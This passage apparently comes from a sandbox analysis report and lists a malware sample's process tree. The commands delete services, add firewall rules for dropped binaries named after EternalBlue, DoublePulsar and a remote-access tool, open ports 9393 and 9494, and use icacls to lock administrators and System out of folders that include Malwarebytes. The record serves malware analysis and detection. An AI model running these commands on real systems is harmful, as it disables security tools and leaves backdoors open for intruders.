                                                                          2⤵
                                                                            PID:5692
                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                              sc delete "windows node"
                                                                              3⤵
                                                                              • Launches sc.exe
                                                                              PID:4068
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
                                                                            2⤵
                                                                              PID:1684
                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                sc stop Adobeflashplayer
                                                                                3⤵
                                                                                • Launches sc.exe
                                                                                PID:6024
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
                                                                              2⤵
                                                                                PID:2372
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  sc delete AdobeFlashPlayer
                                                                                  3⤵
                                                                                  • Launches sc.exe
                                                                                  PID:3864
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c sc stop MoonTitle
                                                                                2⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4160
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  sc stop MoonTitle
                                                                                  3⤵
                                                                                  • Launches sc.exe
                                                                                  PID:2592
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
                                                                                2⤵
                                                                                  PID:4868
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    sc delete MoonTitle"
                                                                                    3⤵
                                                                                    • Launches sc.exe
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:3788
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c sc stop AudioServer
                                                                                  2⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2712
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    sc stop AudioServer
                                                                                    3⤵
                                                                                    • Launches sc.exe
                                                                                    PID:1340
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c sc delete AudioServer"
                                                                                  2⤵
                                                                                    PID:1272
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      sc delete AudioServer"
                                                                                      3⤵
                                                                                      • Launches sc.exe
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2536
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
                                                                                    2⤵
                                                                                      PID:3360
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        sc stop clr_optimization_v4.0.30318_64
                                                                                        3⤵
                                                                                        • Launches sc.exe
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:4776
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
                                                                                      2⤵
                                                                                        PID:4132
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          sc delete clr_optimization_v4.0.30318_64"
                                                                                          3⤵
                                                                                          • Launches sc.exe
                                                                                          PID:696
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
                                                                                        2⤵
                                                                                          PID:5528
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            sc stop MicrosoftMysql
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2080
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
                                                                                          2⤵
                                                                                            PID:5316
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              sc delete MicrosoftMysql
                                                                                              3⤵
                                                                                              • Launches sc.exe
                                                                                              PID:756
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                                                                                            2⤵
                                                                                              PID:3908
                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                netsh advfirewall set allprofiles state on
                                                                                                3⤵
                                                                                                • Modifies Windows Firewall
                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1764
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                              2⤵
                                                                                                PID:6012
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  PID:2012
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4088
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2712
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:908
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  PID:5296
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                2⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4596
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2524
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                2⤵
                                                                                                  PID:5732
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    3⤵
                                                                                                      PID:4260
                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                      3⤵
                                                                                                      • Modifies Windows Firewall
                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                      PID:500
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                    2⤵
                                                                                                      PID:5840
                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                        netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                        3⤵
                                                                                                        • Modifies Windows Firewall
                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                        PID:5364
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                      2⤵
                                                                                                        PID:5136
                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                          netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                          3⤵
                                                                                                          • Modifies Windows Firewall
                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                          PID:2464
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                        2⤵
                                                                                                          PID:5556
                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                            netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                            3⤵
                                                                                                            • Modifies Windows Firewall
                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                            PID:2060
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                          2⤵
                                                                                                            PID:4988
                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                              netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                              3⤵
                                                                                                              • Modifies Windows Firewall
                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                              PID:3636
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                            2⤵
                                                                                                              PID:5588
                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                3⤵
                                                                                                                • Modifies Windows Firewall
                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                PID:3776
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                              2⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2180
                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                                3⤵
                                                                                                                • Modifies Windows Firewall
                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:2792
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                              2⤵
                                                                                                                PID:3152
                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                  netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                                  3⤵
                                                                                                                  • Modifies Windows Firewall
                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                  PID:3036
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                2⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:348
                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                  netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                  3⤵
                                                                                                                  • Modifies Windows Firewall
                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                  PID:1672
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                2⤵
                                                                                                                  PID:5252
                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                    netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                    3⤵
                                                                                                                    • Modifies Windows Firewall
                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                    PID:3688
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                  2⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:4856
                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                    netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                    3⤵
                                                                                                                    • Modifies Windows Firewall
                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                    PID:5008
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                  2⤵
                                                                                                                    PID:4116
                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                      netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                      3⤵
                                                                                                                      • Modifies Windows Firewall
                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                      PID:916
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                    2⤵
                                                                                                                      PID:200
                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                        netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                        3⤵
                                                                                                                        • Modifies Windows Firewall
                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                        PID:1324
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                      2⤵
                                                                                                                        PID:1672
                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                          netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                          3⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:4992
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                        2⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:5828
                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                          netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                          3⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:6016
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                        2⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:5084
                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                          netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                          3⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                          PID:2412
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                                                                                                                        2⤵
                                                                                                                          PID:448
                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                                                                                                                            3⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5568
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                          2⤵
                                                                                                                            PID:1076
                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                              icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                              3⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:3400
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                            2⤵
                                                                                                                              PID:4132
                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                3⤵
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:4340
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                              2⤵
                                                                                                                                PID:2068
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                  3⤵
                                                                                                                                  • Modifies file permissions
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:736
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                2⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:2592
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                  3⤵
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:2992
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
                                                                                                                                2⤵
                                                                                                                                  PID:1112
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    3⤵
                                                                                                                                      PID:756
                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                      icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
                                                                                                                                      3⤵
                                                                                                                                      • Modifies file permissions
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:1004
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                                                                                                                    2⤵
                                                                                                                                      PID:2528
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                                                                                                                        3⤵
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:5780
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                      2⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:5732
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                        3⤵
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:5368
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                                                                                                                      2⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:6000
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        3⤵
                                                                                                                                          PID:5588
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                                                                                                                          3⤵
                                                                                                                                          • Modifies file permissions
                                                                                                                                          PID:5892
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                        2⤵
                                                                                                                                          PID:3012
                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                            3⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:1300
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
                                                                                                                                          2⤵
                                                                                                                                            PID:1192
                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                              icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
                                                                                                                                              3⤵
                                                                                                                                              • Modifies file permissions
                                                                                                                                              PID:4856
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                            2⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:1864
                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                              icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                              3⤵
                                                                                                                                              • Modifies file permissions
                                                                                                                                              PID:5136
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
                                                                                                                                            2⤵
                                                                                                                                              PID:656
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
                                                                                                                                                3⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:5904
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                              2⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:5948
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                                3⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4832
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
                                                                                                                                              2⤵
                                                                                                                                                PID:3788
                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                  icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies file permissions
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:1172
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                2⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4300
                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                  icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies file permissions
                                                                                                                                                  PID:4692
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
                                                                                                                                                2⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2464
                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5084
                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                    icacls c:\programdata\Malwarebytes /deny Admin:(F)
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4260
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                  2⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2252
                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                    icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3300
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
                                                                                                                                                  2⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3304
                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                    icacls C:\Programdata\MB3Install /deny Admin:(F)
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:5840
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4144
                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      3⤵
                                                                                                                                                        PID:916
                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                        icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies file permissions
                                                                                                                                                        PID:4680
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
                                                                                                                                                      2⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:2096
                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                        icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies file permissions
                                                                                                                                                        PID:3968
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2200
                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                          icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                          3⤵
